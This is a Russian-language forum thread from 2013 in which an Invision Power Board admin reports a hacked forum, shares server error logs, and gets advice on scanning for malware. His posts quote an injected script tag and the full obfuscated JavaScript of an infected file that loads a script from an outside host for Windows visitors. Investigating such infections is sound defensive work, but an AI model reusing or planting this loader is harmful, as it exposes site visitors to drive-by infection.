Взлом форума и логи php - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

Правила раздела

Здесь обсуждаются вопросы по настройке и администрированию форумов IPB 3.x.
Пожалуйста, не оффтопьте, если зашли сюда случайно, и обратите внимание на соседние разделы.
Установка, настройка и обслуживание форумов IPB 2.x.
Оформление форумов, включая верстку скинов.
Размещение рекламы на форумах.
SEO оптимизация форума.
Техническая поддержка наших скинов и модов.

СвернутьПрикрепленные теги

Теги не найдены

Страница 1 из 1

Взлом форума и логи php

#1 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 050
  • Регистрация: 13-Апрель 12
  • Репутация: 310
  • Откуда:no
  • IPB version:1.x
 

Отправлено 28 Ноябрь 2013 - 08:10

Раньше лог ошибок был пуст.

[Thu Nov 28 00:43:44 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2722-vse-voprosy-po-forumu-prinimaiutsia-zdes/page-54
[Thu Nov 28 00:43:49 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/index.php?app=core&module=search&do=viewNewContent&search_app=forums
[Thu Nov 28 00:43:49 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/index.php?app=core&module=search&do=viewNewContent&search_app=forums
[Thu Nov 28 00:43:50 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/forum/136-privatnaia-komnata/
[Thu Nov 28 00:43:50 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/forum/136-privatnaia-komnata/
[Thu Nov 28 00:43:51 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2839-sniatsia-li-vam-sny-o-rabote/page-22#entry293984
[Thu Nov 28 00:43:51 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2839-sniatsia-li-vam-sny-o-rabote/page-22#entry293984
[Thu Nov 28 02:19:20 2013] [error] [client 1.1.1.1] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++Result:+\xee\xf8\xe8\xe1\xea\xe0:+"\xc2\xfb+\xe4\xe0\xeb\xe8+\xed\xe5\xe2\xe5\xf0\xed\xfb\xe9+\xee\xf2\xe2\xe5\xf2+\xed\xe0+\xe2\xee\xef\xf0\xee\xf1+\xef\xf0\xe8+\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe0\xf6\xe8\xe8.+\xcf\xee\xef\xf0\xee\xe1\xf3\xe9\xf2\xe5+\xe5\xf9\xe5+\xf0\xe0\xe7.";+\xf2\xe5\xea\xf1\xf2\xee\xe2\xe0\xff+\xea\xe0\xef\xf7\xe0+\xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed\xe0+\xed\xe5\xe2\xe5\xf0\xed\xee;+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"roustytug";+ReCaptcha+\xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed\xe0;+(JS);+\xe7\xe0\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe8\xf0\xee\xe2\xe0\xeb\xe8\xf1\xfc+(\xe2\xea\xeb\xfe\xf7\xe5\xed+\xf0\xe5\xe6\xe8\xec+\xf2\xee\xeb\xfc\xea\xee+\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe0\xf6\xe8\xe8); failed, referer: http://сайт.ru/index.php++++++++++++++++++++++++++++++++++++Result:+%EE%F8%E8%E1%EA%E0:+%22%C2%FB+%E4%E0%EB%E8+%ED%E5%E2%E5%F0%ED%FB%E9+%EE%F2%E2%E5%F2+%ED%E0+%E2%EE%EF%F0%EE%F1+%EF%F0%E8+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8.+%CF%EE%EF%F0%EE%E1%F3%E9%F2%E5+%E5%F9%E5+%F0%E0%E7.%22;+%F2%E5%EA%F1%F2%EE%E2%E0%FF+%EA%E0%EF%F7%E0+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED%E0+%ED%E5%E2%E5%F0%ED%EE;+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22roustytug%22;+ReCaptcha+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED%E0;+%28JS%29;+%E7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%EB%E8%F1%FC+%28%E2%EA%EB%FE%F7%E5%ED+%F0%E5%E6%E8%EC+%F2%EE%EB%FC%EA%EE+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8%29;
[Thu Nov 28 04:56:49 2013] [error] [client 1.1.1.1] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Thu Nov 28 05:56:27 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75
[Thu Nov 28 08:44:44 2013] [warn] [client 1.1.1.1] (104)Connection reset by peer: mod_fcgid: error reading data from FastCGI server, referer: http://сайт.ru/topic/2114-ia-segodnia/
[Thu Nov 28 08:44:44 2013] [error] [client 1.1.1.1] Premature end of script headers: 404.php, referer: http://сайт.ru/topic/2114-ia-segodnia/


Открыл Файл min/index.php Там был странный путь к iloveu.js, открыл этот файлик а там шел.
;document.write(\"<scr\"+\"ipt src=\'/public/style_images/mobile_app/iloveu.js\'><\"+\"/script>\");


Удалил, вроде все работает. Кто сталкивался с таким?
0

#2 Пользователь не на сайте   Ph-A ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 5 558
  • Регистрация: 18-Сентябрь 06
  • Репутация: 382
  • Откуда:Moscow
  • IPB version:3.1.x
 

Отправлено 28 Ноябрь 2013 - 16:31

Просмотреть сообщениеАтаман сказал(а):

открыл этот файлик а там шел.

Думаете в одном месте шел?

Просмотреть сообщениеАтаман сказал(а):

Кто сталкивался с таким?

Надо у IPS смотреть уязвимости.


p.s. Неужели считаете, что скин по умолчанию так изменен, что можно снести копирайт автора?
1

#3 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 050
  • Регистрация: 13-Апрель 12
  • Репутация: 310
  • Откуда:no
  • IPB version:1.x
 

Отправлено 28 Ноябрь 2013 - 16:36

Цитата

p.s. Неужели считаете, что скин по умолчанию так изменен, что можно снести копирайт автора?


Задняя картинка только от автора и все, а так шаблон переделывался со стандартного. Если нужно Фисане предоставлю доступ пусть проверит).

IPS уже просматриваю, спс, просто файл за 5тый месяц там был, но я вродже удалял все до единой папки оставлял uploads и смайлы + хуки моды переставлял, на сервере все пароли поменял, возможно другой админ заразил.
0

#4 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 050
  • Регистрация: 13-Апрель 12
  • Репутация: 310
  • Откуда:no
  • IPB version:1.x
 

Отправлено 29 Ноябрь 2013 - 13:45

Снова повторилось.

зараженный файл tesoro.js
Содержимое:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\'\':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!\'\'.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'5 m(c){r(7.l&&7.j){2 i=7.j(\\\'S\\\')[0];2 8=7.l(\\\'R\\\');8.h(\\\'P\\\',\\\'N/O\\\');8.h(\\\'c\\\',c);i.U(8)}}5 q(3){b 3.e(\"M\")==-1}2 10=\"{Z{D?t&}f#;,~v)$\";2 X=\"V%]g%Q!,![W@11:K\";2 B=\"%%->w:z:{}]!Y+y!\";2 x=\"C#!v[I H\";2 F=\"J+{<G+\";5 u(3){b 3.e(a)!=-1}2 E=\"A,T)6]1p!12`>D}1o\";2 1n=\"~$1k)~1l~]H`%{L\";2 1j=\"~4:$](1m.~.1h`*@9\";2 1i=\"17-18 [[s=16\";2 15=\"w*n?? @13 14]:(19\";5 o(){b p.1a()}2 k=\"1f://1g.1e.3/1d\";2 a=\"a\";5 d(){2 3=p.1b.1c();r(q(3)&&u(3)&&o()){m(k)}}d();\',62,88,\'||var|ua||function||document|script_tag||win|return|src|includeCounter|indexOf|||setAttribute|head_tag|getElementsByTagName|url|createElement|includeJavascript||cond3|navigator|notChrome|if|||isWin|||nzVVMTHUln3|z1|n4||nzVVMTHUln2|ij3o||XDJOlGBk0|nzVVMTHUln4|qcf||Rc_B|vbAGL|H9||chrome|text|javascript|type||script|head|VS|appendChild|C3|B5|nzVVMTHUln1||40|nzVVMTHUln0|eB|Jg|2y|PO|XDJOlGBk4|Ww|G4T|_N|4k|javaEnabled|userAgent|toLowerCase|8bc0e1080cd5|pp|http|tozok|oa|XDJOlGBk3|XDJOlGBk2|b8rZ|VF|_a4rx|XDJOlGBk1|36|Sl5i\'.split(\'|\'),0,{}))


Вот лог:

[Fri Nov 29 14:38:39 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:38:39 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:00 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:00 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:03 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:03 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:57 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:57 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:40:16 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:40:16 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/


Подскажиту, куда рыться? так как Фтп полностью чистел, хостинг говрит что все ОК.
0

#5 Пользователь не на сайте   Dmitriy427 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 574
  • Регистрация: 15-Октябрь 11
  • Репутация: 149
  • Откуда:Россия, Тула
  • IPB version:3.3.x
 

Отправлено 29 Ноябрь 2013 - 14:06

Можно сюда - http://revisium.com/ai/. Но там тоже надо разобраться, а то наудаляете лишнего.

P.S. Вообще, ничего особо сложного. Сканируете, открываете в браузере файл отчёа. Подозрительные файлы там будут отсортированы по категориям и степени угроз. Те, что в залитых вами дистрибутивах отсутствуют можно сразу удалять, за исключением файлов из папок загрузки, с ними нужно разбираться отдельно. Те файлы, что присутствуют в дистрибутивах, но помечены как угрозы, просто сравниваете с исходными.
1

#6 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 050
  • Регистрация: 13-Апрель 12
  • Репутация: 310
  • Откуда:no
  • IPB version:1.x
 

Отправлено 29 Ноябрь 2013 - 14:20

Просмотреть сообщениеDmitriy427 29 Ноябрь 2013 - 14:06 сказал(а):

Можно сюда - http://revisium.com/ai/. Но там тоже надо разобраться, а то наудаляете лишнего.


Критические замечания. Шелл-скрипты не найдены.
0

#7 Пользователь не на сайте   Dmitriy427 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 574
  • Регистрация: 15-Октябрь 11
  • Репутация: 149
  • Откуда:Россия, Тула
  • IPB version:3.3.x
 

Отправлено 29 Ноябрь 2013 - 14:28

Просмотреть сообщениеАтаман 29 Ноябрь 2013 - 14:20 сказал(а):

Критические замечания. Шелл-скрипты не найдены.

Нужно выполнить сканирование из командной строки, вариант с запуском из браузера ограничен функционально.
1

#8 Пользователь не на сайте   Ph-A ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 5 558
  • Регистрация: 18-Сентябрь 06
  • Репутация: 382
  • Откуда:Moscow
  • IPB version:3.1.x
 

Отправлено 29 Ноябрь 2013 - 20:58

Просмотреть сообщениеАтаман сказал(а):

Снова повторилось.

Не удивительно. Если есть взлом, то замена паролей не помогает

Просмотреть сообщениеАтаман сказал(а):

Критические замечания. Шелл-скрипты не найдены.

На VDS один сайт?


P.S. В последнее время сайты на IP.Board стараюсь хостить отдельно ....
1

#9 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 050
  • Регистрация: 13-Апрель 12
  • Репутация: 310
  • Откуда:no
  • IPB version:1.x
 

Отправлено 29 Ноябрь 2013 - 21:37

Цитата


На VDS один сайт?


P.S. В последнее время сайты на IP.Board стараюсь хостить отдельно ....


Один.
0

#10 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 050
  • Регистрация: 13-Апрель 12
  • Репутация: 310
  • Откуда:no
  • IPB version:1.x
 

Отправлено 09 Декабрь 2013 - 08:41

Просмотреть сообщениеDmitriy427 29 Ноябрь 2013 - 14:28 сказал(а):

Нужно выполнить сканирование из командной строки, вариант с запуском из браузера ограничен функционально.



Спасибо запустил скрипт по SSH, нашло пару вирусов (Под видом аватарки и тд), все почистил.
0

Сообщить об этой теме:


Страница 1 из 1


Быстрый ответ

  

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна